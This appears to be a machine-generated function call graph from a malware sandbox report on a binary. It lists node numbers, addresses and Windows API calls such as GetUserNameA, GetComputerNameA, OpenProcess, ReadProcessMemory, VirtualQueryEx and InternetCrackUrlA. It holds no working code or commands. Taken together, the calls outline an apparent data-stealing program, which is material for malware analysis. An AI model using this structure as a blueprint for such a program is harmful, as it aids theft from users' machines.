13295->13296 13297 3054610 34 API calls 13296->13297 13298 3053abe 13297->13298 13299 3054610 34 API calls 13298->13299 13300 3053ad7 13299->13300 13301 3054610 34 API calls 13300->13301 13302 3053af0 13301->13302 13303 3054610 34 API calls 13302->13303 13304 3053b09 13303->13304 13305 3054610 34 API calls 13304->13305 13306 3053b22 13305->13306 13307 3054610 34 API calls 13306->13307 13308 3053b3b 13307->13308 13309 3054610 34 API calls 13308->13309 13310 3053b54 13309->13310 13311 3054610 34 API calls 13310->13311 13312 3053b6d 13311->13312 13313 3054610 34 API calls 13312->13313 13314 3053b86 13313->13314 13315 3054610 34 API calls 13314->13315 13316 3053b9f 13315->13316 13317 3054610 34 API calls 13316->13317 13318 3053bb8 13317->13318 13319 3054610 34 API calls 13318->13319 13320 3053bd1 13319->13320 13321 3054610 34 API calls 13320->13321 13322 3053bea 13321->13322 13323 3054610 34 API calls 13322->13323 13324 3053c03 13323->13324 13325 3054610 34 API calls 13324->13325 13326 3053c1c 13325->13326 13327 3054610 34 API calls 13326->13327 13328 3053c35 13327->13328 13329 3054610 34 API calls 13328->13329 13330 3053c4e 13329->13330 13331 3054610 34 API calls 13330->13331 13332 3053c67 13331->13332 13333 3054610 34 API calls 13332->13333 13334 3053c80 13333->13334 13335 3054610 34 API calls 13334->13335 13336 3053c99 13335->13336 13337 3054610 34 API calls 13336->13337 13338 3053cb2 13337->13338 13339 3054610 34 API calls 13338->13339 13340 3053ccb 13339->13340 13341 3054610 34 API calls 13340->13341 13342 3053ce4 13341->13342 13343 3054610 34 API calls 13342->13343 13344 3053cfd 13343->13344 13345 3054610 34 API calls 13344->13345 13346 3053d16 13345->13346 13347 3054610 34 API calls 13346->13347 13348 3053d2f 13347->13348 13349 3054610 34 API calls 13348->13349 13350 3053d48 13349->13350 13351 3054610 34 API calls 13350->13351 13352 3053d61 13351->13352 13353 3054610 34 API calls 13352->13353 13354 3053d7a 13353->13354 13355 3054610 34 API calls 13354->13355 13356 3053d93 13355->13356 13357 3054610 34 API calls 13356->13357 13358 3053dac 13357->13358 13359 3054610 34 API calls 13358->13359 13360 3053dc5 13359->13360 13361 3054610 34 API calls 13360->13361 13362 3053dde 13361->13362 13363 3054610 34 API calls 13362->13363 13364 3053df7 13363->13364 13365 3054610 34 API calls 13364->13365 13366 3053e10 13365->13366 13367 3054610 34 API calls 13366->13367 13368 3053e29 13367->13368 13369 3054610 34 API calls 13368->13369 13370 3053e42 13369->13370 13371 3054610 34 API calls 13370->13371 13372 3053e5b 13371->13372 13373 3054610 34 API calls 13372->13373 13374 3053e74 13373->13374 13375 3054610 34 API calls 13374->13375 13376 3053e8d 13375->13376 13377 3054610 34 API calls 13376->13377 13378 3053ea6 13377->13378 13379 3054610 34 API calls 13378->13379 13380 3053ebf 13379->13380 13381 3054610 34 API calls 13380->13381 13382 3053ed8 13381->13382 13383 3054610 34 API calls 13382->13383 13384 3053ef1 13383->13384 13385 3054610 34 API calls 13384->13385 13386 3053f0a 13385->13386 13387 3054610 34 API calls 13386->13387 13388 3053f23 13387->13388 13389 3054610 34 API calls 13388->13389 13390 3053f3c 13389->13390 13391 3054610 34 API calls 13390->13391 13392 3053f55 13391->13392 13393 3054610 34 API calls 13392->13393 13394 3053f6e 13393->13394 13395 3054610 34 API calls 13394->13395 13396 3053f87 13395->13396 13397 3054610 34 API calls 13396->13397 13398 3053fa0 13397->13398 13399 3054610 34 API calls 13398->13399 13400 3053fb9 13399->13400 13401 3054610 34 API calls 13400->13401 13402 3053fd2 13401->13402 13403 3054610 34 API calls 13402->13403 13404 3053feb 13403->13404 13405 3054610 34 API calls 13404->13405 13406 3054004 13405->13406 13407 3054610 34 API calls 13406->13407 13408 305401d 13407->13408 13409 3054610 34 API calls 13408->13409 13410 3054036 13409->13410 13411 3054610 34 API calls 13410->13411 13412 305404f 13411->13412 13413 3054610 34 API calls 13412->13413 13414 3054068 13413->13414 13415 3054610 34 API calls 13414->13415 13416 3054081 13415->13416 13417 3054610 34 API calls 13416->13417 13418 305409a 13417->13418 13419 3054610 34 API calls 13418->13419 13420 30540b3 13419->13420 13421 3054610 34 API calls 13420->13421 13422 30540cc 13421->13422 13423 3054610 34 API calls 13422->13423 13424 30540e5 13423->13424 13425 3054610 34 API calls 13424->13425 13426 30540fe 13425->13426 13427 3054610 34 API calls 13426->13427 13428 3054117 13427->13428 13429 3054610 34 API calls 13428->13429 13430 3054130 13429->13430 13431 3054610 34 API calls 13430->13431 13432 3054149 13431->13432 13433 3054610 34 API calls 13432->13433 13434 3054162 13433->13434 13435 3054610 34 API calls 13434->13435 13436 305417b 13435->13436 13437 3054610 34 API calls 13436->13437 13438 3054194 13437->13438 13439 3054610 34 API calls 13438->13439 13440 30541ad 13439->13440 13441 3054610 34 API calls 13440->13441 13442 30541c6 13441->13442 13443 3054610 34 API calls 13442->13443 13444 30541df 13443->13444 13445 3054610 34 API calls 13444->13445 13446 30541f8 13445->13446 13447 3054610 34 API calls 13446->13447 13448 3054211 13447->13448 13449 3054610 34 API calls 13448->13449 13450 305422a 13449->13450 13451 3054610 34 API calls 13450->13451 13452 3054243 13451->13452 13453 3054610 34 API calls 13452->13453 13454 305425c 13453->13454 13455 3054610 34 API calls 13454->13455 13456 3054275 13455->13456 13457 3054610 34 API calls 13456->13457 13458 305428e 13457->13458 13459 3054610 34 API calls 13458->13459 13460 30542a7 13459->13460 13461 3054610 34 API calls 13460->13461 13462 30542c0 13461->13462 13463 3054610 34 API calls 13462->13463 13464 30542d9 13463->13464 13465 3054610 34 API calls 13464->13465 13466 30542f2 13465->13466 13467 3054610 34 API calls 13466->13467 13468 305430b 13467->13468 13469 3054610 34 API calls 13468->13469 13470 3054324 13469->13470 13471 3054610 34 API calls 13470->13471 13472 305433d 13471->13472 13473 3054610 34 API calls 13472->13473 13474 3054356 13473->13474 13475 3054610 34 API calls 13474->13475 13476 305436f 13475->13476 13477 3054610 34 API calls 13476->13477 13478 3054388 13477->13478 13479 3054610 34 API calls 13478->13479 13480 30543a1 13479->13480 13481 3054610 34 API calls 13480->13481 13482 30543ba 13481->13482 13483 3054610 34 API calls 13482->13483 13484 30543d3 13483->13484 13485 3054610 34 API calls 13484->13485 13486 30543ec 13485->13486 13487 3054610 34 API calls 13486->13487 13488 3054405 13487->13488 13489 3054610 34 API calls 13488->13489 13490 305441e 13489->13490 13491 3054610 34 API calls 13490->13491 13492 3054437 13491->13492 13493 3054610 34 API calls 13492->13493 13494 3054450 13493->13494 13495 3054610 34 API calls 13494->13495 13496 3054469 13495->13496 13497 3054610 34 API calls 13496->13497 13498 3054482 13497->13498 13499 3054610 34 API calls 13498->13499 13500 305449b 13499->13500 13501 3054610 34 API calls 13500->13501 13502 30544b4 13501->13502 13503 3054610 34 API calls 13502->13503 13504 30544cd 13503->13504 13505 3054610 34 API calls 13504->13505 13506 30544e6 13505->13506 13507 3054610 34 API calls 13506->13507 13508 30544ff 13507->13508 13509 3054610 34 API calls 13508->13509 13510 3054518 13509->13510 13511 3054610 34 API calls 13510->13511 13512 3054531 13511->13512 13513 3054610 34 API calls 13512->13513 13514 305454a 13513->13514 13515 3054610 34 API calls 13514->13515 13516 3054563 13515->13516 13517 3054610 34 API calls 13516->13517 13518 305457c 13517->13518 13519 3054610 34 API calls 13518->13519 13520 3054595 13519->13520 13521 3054610 34 API calls 13520->13521 13522 30545ae 13521->13522 13523 3054610 34 API calls 13522->13523 13524 30545c7 13523->13524 13525 3054610 34 API calls 13524->13525 13526 30545e0 13525->13526 13527 3054610 34 API calls 13526->13527 13528 30545f9 13527->13528 13529 30695e0 13528->13529 13530 3069a06 8 API calls 13529->13530 13532 30695f0 13529->13532 13531 3069a9c 13530->13531 13531->12821 13532->13530 13536 3065001 13533->13536 13534 3064cd0 9 API calls 13534->13536 13535 3064da0 10 API calls 13535->13536 13536->13534 13536->13535 13537 30652bc 13536->13537 13537->12823 13539 3066fe8 GetVolumeInformationA 13538->13539 13541 3067031 13539->13541 13541->12825 13543 30548e9 13542->13543 13759 3054800 13543->13759 13545 3054f0e ctype 13545->12827 13546 3054ef9 InternetCloseHandle 13546->13545 13547 30548f5 13547->13545 13547->13546 13549 30612d4 13548->13549 13550 30612e7 13549->13550 13551 30612df ExitProcess 13549->13551 13552 30612f7 strtok_s 13550->13552 13554 3061304 13552->13554 13553 30614d2 13553->12829 13554->13553 13555 30614ae strtok_s 13554->13555 13555->13554 13557 30559c9 13556->13557 13558 3054800 4 API calls 13557->13558 13559 30559d5 13558->13559 13560 3055f0e memcpy 13559->13560 13563 3055f6a ctype 13559->13563 13561 3055f27 13560->13561 13562 3055f47 memcpy 13561->13562 13562->13563 13563->12831 13767 306a4a0 13564->13767 13566 3060b87 strtok_s 13569 3060b94 13566->13569 13567 3060c61 13567->12833 13568 3060c3d strtok_s 13568->13569 13569->13567 13569->13568 13768 306a4a0 13570->13768 13572 30608c7 strtok_s 13575 30608d4 13572->13575 13573 3060a27 13573->12837 13574 3060a03 strtok_s 13574->13575 13575->13573 13575->13574 13769 306a4a0 13576->13769 13578 3060a77 strtok_s 13580 3060a84 13578->13580 13579 3060b54 13579->12841 13580->13579 13581 3060b30 strtok_s 13580->13581 13581->13580 13583 3061536 13582->13583 13584 3066fa0 GetVolumeInformationA 13583->13584 13585 30616a6 13584->13585 13586 30672f0 GetUserNameA 13585->13586 13587 3061824 13586->13587 13588 3067380 GetComputerNameA 13587->13588 13589 306189e 13588->13589 13770 3064c70 13589->13770 13591 30621a9 13591->12843 13593 3055020 13592->13593 13594 30550c0 memcpy 13593->13594 13595 30550f0 13593->13595 13594->13593 13595->12845 13784 3059920 13596->13784 13598 3060599 13599 3060878 13598->13599 13602 30605bd 13598->13602 13811 3060090 13599->13811 13601 306088e 13601->12847 13607 3060683 13602->13607 13787 305f940 13602->13787 13604 30607ab 13606 306086d 13604->13606 13803 305fe70 13604->13803 13606->12847 13607->13604 13795 305fba0 13607->13795 13969 306a4a0 13609->13969 13611 3060ca7 strtok_s 13614 3060cb4 13611->13614 13612 3060dc0 13612->12851 13613 3060d9c strtok_s 13613->13614 13614->13612 13614->13613 13618 3051ecf 13615->13618 13616 3051f77 13974 3051310 memset 13616->13974 13618->13616 13970 3051710 13618->13970 13619 3051f8d 13619->12853 13980 306a4a0 13621->13980 13623 3060e16 strtok_s 13626 3060e4b ctype 13623->13626 13624 3061283 13624->12862 13625 3061250 strtok_s 13625->13626 13626->13624 13626->13625 13630 30638df 13627->13630 13628 3063928 13628->12863 13630->13628 13981 30637a0 13630->13981 13994 306a4a0 13631->13994 13633 3063097 strtok_s 13637 30630b1 13633->13637 13634 30631fb 13634->12863 13635 30631d7 strtok_s 13635->13637 13637->13634 13637->13635 13995 3062940 13637->13995 13639 3063c0a ctype 13638->13639 14004 30639b0 13639->14004 13641 3063c95 13642 30639b0 7 API calls 13641->13642 13643 3063cbf 13642->13643 13644 30639b0 7 API calls 13643->13644 13645 3063ce9 13644->13645 13646 30639b0 7 API calls 13645->13646 13647 3063d13 13646->13647 13648 30639b0 7 API calls 13647->13648 13649 3063d3d 13648->13649 13650 30639b0 7 API calls 13649->13650 13651 3063d67 ctype 13650->13651 13651->12868 13653 3064bf3 13652->13653 14008 3066d90 13653->14008 13655 3064bf8 13656 3064c70 7 API calls 13655->13656 13657 3064c43 13656->13657 13657->12866 13659 306427a ctype 13658->13659 13661 306438f ctype 13659->13661 14171 3064050 13659->14171 13661->12867 13663 30646aa ctype 13662->13663 14183 30643f0 13663->14183 13665 306471d 13666 30643f0 7 API calls 13665->13666 13667 3064752 13666->13667 13668 30643f0 7 API calls 13667->13668 13669 3064788 13668->13669 13670 30643f0 7 API calls 13669->13670 13671 30647bd 13670->13671 13672 30643f0 7 API calls 13671->13672 13673 30647f3 13672->13673 13674 30643f0 7 API calls 13673->13674 13675 3064828 ctype 13674->13675 13675->12871 13677 306487e 13676->13677 13678 30643f0 7 API calls 13677->13678 13679 30648df memset 13678->13679 13680 306490a 13679->13680 13681 30643f0 7 API calls 13680->13681 13682 306496b memset 13681->13682 13683 3064996 13682->13683 13684 30643f0 7 API calls 13683->13684 13685 30649f7 memset 13684->13685 13686 3064a1c 13685->13686 13686->12873 13688 3064a3a ctype 13687->13688 13689 30643f0 7 API calls 13688->13689 13690 3064ad3 13689->13690 13691 30643f0 7 API calls 13690->13691 13692 3064b08 ctype 13691->13692 13692->12874 13694 305775d ctype 13693->13694 14188 3057610 13694->14188 13697 3057610 13 API calls 13698 3057cdf 13697->13698 13699 3057610 13 API calls 13698->13699 13700 3057cee 13699->13700 13701 3057610 13 API calls 13700->13701 13702 3057cfd 13701->13702 13703 3057610 13 API calls 13702->13703 13704 3057d0c 13703->13704 13705 3057610 13 API calls 13704->13705 13706 3057d1b 13705->13706 13707 3057610 13 API calls 13706->13707 13708 3057d2a 13707->13708 13709 3057610 13 API calls 13708->13709 13710 3057d39 13709->13710 13711 3057610 13 API calls 13710->13711 13712 3057d48 13711->13712 13713 3057610 13 API calls 13712->13713 13714 3057d57 13713->13714 13715 3057610 13 API calls 13714->13715 13716 3057d66 13715->13716 13717 3057610 13 API calls 13716->13717 13718 3057d75 13717->13718 13719 3057610 13 API calls 13718->13719 13720 3057d84 13719->13720 13721 3057610 13 API calls 13720->13721 13722 3057d93 13721->13722 13723 3057610 13 API calls 13722->13723 13724 3057da2 13723->13724 13725 3057610 13 API calls 13724->13725 13726 3057db1 13725->13726 13727 3057610 13 API calls 13726->13727 13728 3057dc0 13727->13728 13729 3057610 13 API calls 13728->13729 13730 3057dcf 13729->13730 13731 3057610 13 API calls 13730->13731 13732 3057dde 13731->13732 13733 3057610 13 API calls 13732->13733 13734 3057ded 13733->13734 13735 3057610 13 API calls 13734->13735 13736 3057dfc 13735->13736 13737 3057610 13 API calls 13736->13737 13738 3057e0b 13737->13738 13739 3057610 13 API calls 13738->13739 13740 3057e1a 13739->13740 13741 3057610 13 API calls 13740->13741 13742 3057e29 ctype 13741->13742 13743 3064c70 7 API calls 13742->13743 13744 3057eb7 ctype 13742->13744 13743->13744 13744->12879 13746 3064b4a ctype 13745->13746 13747 30643f0 7 API calls 13746->13747 13748 3064bbd ctype 13747->13748 13748->12880 13751 3068ac7 ctype 13749->13751 13750 3068aed 13750->12876 13751->13750 14367 30689d0 13751->14367 13753 3068be0 13753->13750 13754 3064c70 7 API calls 13753->13754 13754->13750 13756 30546e7 13755->13756 13757 30546fc 11 API calls 13756->13757 13758 305479f 6 API calls 13756->13758 13757->13756 13758->12898 13765 3051030 13759->13765 13762 3054888 13763 3054898 InternetCrackUrlA 13762->13763 13764 30548b7 13763->13764 13764->13547 13766 305103a ??_U@YAPAXI ??_U@YAPAXI ??2@YAPAXI 13765->13766 13766->13762 13767->13566 13768->13572 13769->13578 13771 3064c95 13770->13771 13774 3055150 13771->13774 13773 3064caf 13773->13591 13775 3055169 13774->13775 13776 3054800 4 API calls 13775->13776 13777 3055175 13776->13777 13778 30557d7 memcpy 13777->13778 13783 305585d ctype 13777->13783 13779 30557f8 13778->13779 13780 30557ff memcpy 13779->13780 13781 3055817 13780->13781 13782 3055837 memcpy 13781->13782 13782->13783 13783->13773 13822 30598d0 ??2@YAPAXI 13784->13822 13786 3059931 13786->13598 13788 305f956 13787->13788 13789 305fa73 13788->13789 13836 3059d30 13788->13836 13842 305bcb0 13789->13842 13792 305fada 13853 305ea70 13792->13853 13794 305fb4c 13794->13607 13796 305fbb6 13795->13796 13797 305fd3a 13796->13797 13798 3059d30 2 API calls 13796->13798 13799 305bcb0 11 API calls 13797->13799 13798->13797 13800 305fda1 13799->13800 13801 305ea70 7 API calls 13800->13801 13802 305fe13 13801->13802 13802->13604 13804 305fe86 13803->13804 13806 306005e 13804->13806 13896 30621d0 13804->13896 13806->13606 13807 305ff78 13807->13806 13910 305d8c0 13807->13910 13809 305ffdf 13918 305f4f0 13809->13918 13812 30600a6 13811->13812 13813 306014f strtok_s 13812->13813 13814 306052e 13812->13814 13821 3060174 13813->13821 13814->13601 13815 30604ca 13816 3064c70 7 API calls 13815->13816 13817 3060504 13816->13817 13818 3060515 memset 13817->13818 13818->13814 13819 3068380 malloc strncpy 13819->13821 13820 30604af strtok_s 13820->13821 13821->13815 13821->13819 13821->13820 13825 3057000 13822->13825 13824 30598fd ctype 13824->13786 13828 3056d90 13825->13828 13827 3057028 13827->13824 13829 3056db3 13828->13829 13831 3056da9 13828->13831 13829->13831 13832 3056a00 13829->13832 13831->13827 13833 3056a19 13832->13833 13835 3056a25 13832->13835 13834 3056afd memcpy 13833->13834 13833->13835 13834->13835 13835->13831 13837 3059d53 13836->13837 13838 3059e0a 13837->13838 13839 3059dd7 memcmp 13837->13839 13838->13789 13839->13838 13840 3059def 13839->13840 13857 3059bb0 13840->13857 13850 305bcc6 13842->13850 13843 305bd44 13843->13792 13845 305bcb0 11 API calls 13845->13850 13846 305a6c0 11 API calls 13846->13850 13848 3064c70 7 API calls 13848->13850 13850->13843 13850->13845 13850->13846 13850->13848 13861 305a1b0 13850->13861 13867 305ad70 13850->13867 13871 305b370 13850->13871 13877 305b8e0 13850->13877 13883 305b0b0 13850->13883 13855 305ea7f 13853->13855 13854 305eb39 13854->13794 13855->13854 13892 305e270 13855->13892 13858 3059bda 13857->13858 13859 3059c1f 13858->13859 13860 3059c06 memcpy 13858->13860 13859->13838 13860->13859 13866 305a1c6 13861->13866 13862 305a5e1 13864 3064c70 7 API calls 13862->13864 13863 305a625 13863->13850 13864->13863 13866->13862 13866->13863 13887 3059e60 13866->13887 13870 305ad86 13867->13870 13868 3064c70 7 API calls 13869 305b039 13868->13869 13869->13850 13870->13868 13870->13869 13876 305b386 13871->13876 13872 305b817 13873 3064c70 7 API calls 13872->13873 13874 305b86f 13872->13874 13873->13874 13874->13850 13875 3059e60 2 API calls 13875->13876 13876->13872 13876->13874 13876->13875 13882 305b8f6 13877->13882 13878 3059e60 2 API calls 13878->13882 13879 305bbda 13880 3064c70 7 API calls 13879->13880 13881 305bc32 13879->13881 13880->13881 13881->13850 13882->13878 13882->13879 13882->13881 13884 305b0c6 13883->13884 13885 3064c70 7 API calls 13884->13885 13886 305b2fd 13884->13886 13885->13886 13886->13850 13888 3059e70 memcmp 13887->13888 13891 3059f04 13887->13891 13889 3059e8c 13888->13889 13888->13891 13890 3059ea6 memset 13889->13890 13889->13891 13890->13891 13891->13866 13894 305e28d 13892->13894 13893 305e2f1 13893->13855 13894->13893 13895 305dc50 7 API calls 13894->13895 13895->13894 13897 30621e6 13896->13897 13909 306272b 13896->13909 13924 30560f0 13897->13924 13899 3062671 13900 30560f0 4 API calls 13899->13900 13901 3062698 13900->13901 13902 30560f0 4 API calls 13901->13902 13903 30626bc 13902->13903 13904 30560f0 4 API calls 13903->13904 13905 30626e3 13904->13905 13906 30560f0 4 API calls 13905->13906 13907 3062707 13906->13907 13908 30560f0 4 API calls 13907->13908 13908->13909 13909->13807 13914 305d8d6 13910->13914 13911 305d93a 13911->13809 13914->13911 13917 305d8c0 11 API calls 13914->13917 13928 305cd30 13914->13928 13934 305d240 13914->13934 13938 305c7d0 13914->13938 13946 305d5c0 13914->13946 13917->13914 13922 305f506 13918->13922 13919 305f56d 13919->13806 13920 305f4f0 8 API calls 13920->13922 13922->13919 13922->13920 13950 3068f70 13922->13950 13954 305f2e0 13922->13954 13925 3056109 13924->13925 13926 3054800 4 API calls 13925->13926 13927 3056115 ctype 13926->13927 13927->13899 13929 305cd46 13928->13929 13930 305d1c0 memset 13929->13930 13931 305d1d1 13929->13931 13932 3064c70 7 API calls 13929->13932 13930->13931 13931->13914 13933 305d1af 13932->13933 13933->13930 13935 305d256 13934->13935 13936 305d527 13935->13936 13937 3064c70 7 API calls 13935->13937 13936->13914 13937->13936 13940 305c7e4 13938->13940 13939 305ccbf 13939->13914 13940->13939 13941 305c8ee ??2@YAPAXI 13940->13941 13944 305c91f 13941->13944 13942 305cc7b 13943 3064c70 7 API calls 13942->13943 13943->13939 13944->13942 13945 305c660 memset memcpy 13944->13945 13945->13944 13948 305d5d6 13946->13948 13947 305d82e 13947->13914 13948->13947 13949 3064c70 7 API calls 13948->13949 13949->13947 13958 306d220 13950->13958 13953 3068fa3 13953->13922 13956 305f2ff 13954->13956 13955 305f493 13955->13922 13956->13955 13960 305f140 13956->13960 13959 3068f7d memset 13958->13959 13959->13953 13961 305f153 13960->13961 13963 305f27c 13961->13963 13964 305eb60 13961->13964 13963->13955 13966 305eb71 13964->13966 13965 305ebaa 13965->13963 13966->13965 13967 3064c70 7 API calls 13966->13967 13968 305eb60 7 API calls 13966->13968 13967->13966 13968->13966 13969->13611 13972 3051726 ctype 13970->13972 13971 3051972 13971->13618 13972->13971 13973 3064c70 7 API calls 13972->13973 13973->13972 13976 3051344 13974->13976 13975 305152a 13975->13619 13976->13975 13977 3064c70 7 API calls 13976->13977 13978 30514d2 13976->13978 13977->13978 13979 305150b memset 13978->13979 13979->13975 13980->13623 13988 306a4a0 13981->13988 13983 30637ba strtok_s 13985 30637ce 13983->13985 13984 3063842 ctype 13984->13630 13985->13984 13987 3063857 strtok_s 13985->13987 13989 30633c0 13985->13989 13987->13985 13988->13983 13992 30633e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z ctype 13989->13992 13990 3063419 13990->13985 13991 30633c0 7 API calls 13991->13992 13992->13990 13992->13991 13993 3064c70 7 API calls 13992->13993 13993->13992 13994->13633 13996 3062956 13995->13996 13997 3062c6a 13996->13997 13998 3062ea8 13996->13998 14000 3062cf5 13996->14000 14001 3062b57 13996->14001 13997->13637 13999 30560f0 4 API calls 13998->13999 13999->13997 14002 30560f0 4 API calls 14000->14002 14003 30560f0 4 API calls 14001->14003 14002->13997 14003->13997 14006 30639d9 ctype 14004->14006 14005 30639ff ctype 14005->13641 14006->14005 14007 3064c70 7 API calls 14006->14007 14007->14006 14009 3066d9e 14008->14009 14012 3066b70 ??_U@YAPAXI 14009->14012 14011 3066dad 14011->13655 14027 306a110 14012->14027 14014 3066bb1 OpenProcess 14022 3066be8 construct 14014->14022 14026 3066bcb 14014->14026 14015 3066bf5 memset 14029 30669a0 strlen ??_U@YAPAXI 14015->14029 14016 3066d4e ??_V@YAXPAX 14016->14026 14018 3066c79 ReadProcessMemory 14018->14022 14019 3066c65 14019->14016 14022->14015 14022->14016 14022->14018 14022->14019 14023 30580a0 memcpy codecvt 14022->14023 14024 3066d15 14022->14024 14036 3066dc0 14022->14036 14042 3066600 14022->14042 14023->14022 14056 30580a0 14024->14056 14026->14011 14028 306a120 14027->14028 14028->14014 14059 3066670 strlen 14029->14059 14031 3066a24 VirtualQueryEx 14032 3066b49 ??_V@YAXPAX 14031->14032 14035 3066a0c 14031->14035 14034 3066aa8 14032->14034 14033 3066880 ReadProcessMemory 14033->14035 14034->14022 14035->14031 14035->14033 14035->14034 14037 3066dd1 construct 14036->14037 14063 30582d0 14037->14063 14039 3066de5 14067 30582a0 14039->14067 14043 3066dc0 9 API calls 14042->14043 14044 3066613 14043->14044 14146 3066e40 14044->14146 14047 306664e 14154 30595a0 14047->14154 14048 306662f 14150 3066e70 14048->14150 14053 30580a0 codecvt memcpy 14055 3066649 14053->14055 14054 30580a0 codecvt memcpy 14054->14055 14055->14022 14057 30582d0 codecvt memcpy 14056->14057 14058 30580b3 task 14057->14058 14058->14026 14060 30666a1 strlen 14059->14060 14061 3066800 14060->14061 14062 30666b7 14060->14062 14061->14035 14062->14060 14064 30582e3 14063->14064 14066 30582e1 codecvt task 14063->14066 14064->14066 14072 3057230 memcpy 14064->14072 14066->14039 14073 3057210 strlen 14067->14073 14069 30582b0 14074 3058660 14069->14074 14071 30582c0 14071->14022 14072->14066 14073->14069 14075 3058673 14074->14075 14076 305869a 14075->14076 14077 305867a codecvt 14075->14077 14096 3058d10 14076->14096 14083 3058c50 14077->14083 14080 3058698 codecvt 14080->14071 14081 30586a8 codecvt 14081->14080 14105 3057230 memcpy 14081->14105 14084 3058c61 construct 14083->14084 14086 3058c6e construct 14084->14086 14106 3058720 14084->14106 14087 3058cb7 14086->14087 14088 3058c92 14086->14088 14090 3058d10 construct 7 API calls 14087->14090 14109 3058f80 14088->14109 14093 3058cc5 codecvt 14090->14093 14091 3058ca7 14092 3058f80 construct 6 API calls 14091->14092 14095 3058cb5 codecvt 14092->14095 14093->14095 14115 3057230 memcpy 14093->14115 14095->14080 14097 3058d21 construct 14096->14097 14098 3058d2e 14097->14098 14124 3058df0 14097->14124 14100 3058d39 14098->14100 14103 3058d4e 14098->14103 14127 3059050 14100->14127 14102 3058d4c codecvt 14102->14081 14103->14102 14104 30582d0 codecvt memcpy 14103->14104 14104->14102 14105->14080 14116 306d320 14106->14116 14110 3058f94 14109->14110 14112 3058f9c codecvt 14109->14112 14111 3058720 construct 5 API calls 14110->14111 14111->14112 14114 3058fe9 codecvt 14112->14114 14123 3057250 memmove 14112->14123 14114->14091 14115->14095 14117 306a539 std::exception::exception strlen malloc strcpy_s 14116->14117 14118 306d33a 14117->14118 14119 306d394 __CxxThrowException@8 RaiseException 14118->14119 14120 306d34f 14119->14120 14121 306a5c7 std::exception::exception strlen malloc strcpy_s free 14120->14121 14122 3058731 14121->14122 14122->14086 14123->14114 14135 306d2d3 14124->14135 14129 3059086 construct 14127->14129 14142 3059220 14129->14142 14130 3059180 14132 30582d0 codecvt memcpy 14130->14132 14131 30590fe codecvt 14131->14130 14145 3057230 memcpy 14131->14145 14133 305918f codecvt 14132->14133 14133->14102 14136 306a539 std::exception::exception strlen malloc strcpy_s 14135->14136 14137 306d2ed 14136->14137 14138 306d394 __CxxThrowException@8 RaiseException 14137->14138 14139 306d302 14138->14139 14140 306a5c7 std::exception::exception strlen malloc strcpy_s free 14139->14140 14141 3058e01 14140->14141 14141->14098 14143 3059440 allocator 5 API calls 14142->14143 14144 3059232 14143->14144 14144->14131 14145->14130 14147 3066e4f construct codecvt 14146->14147 14160 3066f00 14147->14160 14149 3066621 14149->14047 14149->14048 14151 3066e85 14150->14151 14165 3066eb0 14151->14165 14155 30595b8 construct 14154->14155 14156 30582d0 codecvt memcpy 14155->14156 14157 30595cc 14156->14157 14158 3058c50 construct 8 API calls 14157->14158 14159 30595dc 14158->14159 14159->14054 14162 3066f5e codecvt 14160->14162 14163 3066f14 codecvt 14160->14163 14162->14149 14163->14162 14164 30665e0 memchr 14163->14164 14164->14163 14166 3066ec5 construct 14165->14166 14167 30582d0 codecvt memcpy 14166->14167 14168 3066ed9 14167->14168 14169 3058c50 construct 8 API calls 14168->14169 14170 3066641 14169->14170 14170->14053 14172 3064066 14171->14172 14174 30640b2 ctype 14172->14174 14175 3064179 ctype 14172->14175 14177 3063d90 memset memset 14172->14177 14174->13661 14175->14174 14176 3064c70 7 API calls 14175->14176 14176->14174 14178 3063dea 14177->14178 14179 3059d30 2 API calls 14178->14179 14182 3063f7e ctype 14178->14182 14180 3063ea0 ctype 14179->14180 14181 3059e60 2 API calls 14180->14181 14180->14182 14181->14182 14182->14172 14186 3064412 ctype 14183->14186 14184 3064438 14184->13665 14185 30643f0 7 API calls 14185->14186 14186->14184 14186->14185 14187 3064c70 7 API calls 14186->14187 14187->14186 14193 3057310 14188->14193 14191 3057740 14191->13697 14192 305762b 14208 3058160 14192->14208 14194 305731d 14193->14194 14195 305732e memset 14194->14195 14206 3057380 14195->14206 14196 3057580 14233 3058120 14196->14233 14199 3058160 task memcpy 14200 305759a 14199->14200 14200->14192 14202 30580c0 9 API calls 14202->14206 14206->14196 14206->14202 14207 3059270 strcpy_s 14206->14207 14211 30575b0 14206->14211 14216 3059290 vsprintf_s 14206->14216 14217 30581a0 14206->14217 14228 30575e0 14206->14228 14207->14206 14209 3058560 task memcpy 14208->14209 14210 305816f task 14209->14210 14210->14191 14237 3058070 14211->14237 14214 3058070 memcpy 14215 30575cd 14214->14215 14215->14206 14216->14206 14218 30581b2 construct 14217->14218 14219 3058242 14218->14219 14222 30581c5 construct 14218->14222 14220 305825a 14219->14220 14221 30584f0 9 API calls 14219->14221 14252 30592d0 14220->14252 14221->14220 14223 30581f9 14222->14223 14241 30584f0 14222->14241 14248 3059310 14223->14248 14226 305822e 14226->14206 14229 30580a0 codecvt memcpy 14228->14229 14230 30575f2 14229->14230 14231 30580a0 codecvt memcpy 14230->14231 14232 30575fd 14231->14232 14232->14206 14234 3058138 construct 14233->14234 14325 30583c0 14234->14325 14236 305758f 14236->14199 14238 3058081 construct 14237->14238 14239 30582d0 codecvt memcpy 14238->14239 14240 30575c2 14239->14240 14240->14214 14242 3058501 14241->14242 14243 3058514 14242->14243 14246 305851e 14242->14246 14256 3058b70 14243->14256 14245 305851c 14245->14223 14246->14245 14259 3058860 14246->14259 14249 305931c construct 14248->14249 14309 30594f0 14249->14309 14253 30592dc construct 14252->14253 14318 30594d0 14253->14318 14257 306d2d3 std::_Xinvalid_argument 5 API calls 14256->14257 14258 3058b81 14257->14258 14258->14245 14260 305888d 14259->14260 14261 3058892 14260->14261 14263 305889f 14260->14263 14262 3058b70 5 API calls 14261->14262 14268 305889a task 14262->14268 14263->14268 14270 3058ea0 14263->14270 14267 30588e2 14267->14268 14276 3058ae0 14267->14276 14268->14245 14279 30593e0 14270->14279 14273 3059330 14293 3059600 14273->14293 14301 3059360 14276->14301 14280 30593fc 14279->14280 14283 30588bf 14279->14283 14281 3059405 ??2@YAPAXI 14280->14281 14282 305941e 14280->14282 14281->14282 14281->14283 14287 3057180 14282->14287 14283->14273 14288 306a539 std::exception::exception strlen malloc strcpy_s 14287->14288 14289 3057193 14288->14289 14290 306d394 14289->14290 14291 306d3bd 14290->14291 14292 306d3c9 RaiseException 14290->14292 14291->14292 14292->14283 14294 3059611 _Copy_impl 14293->14294 14297 3059790 14294->14297 14300 30597bf 14297->14300 14298 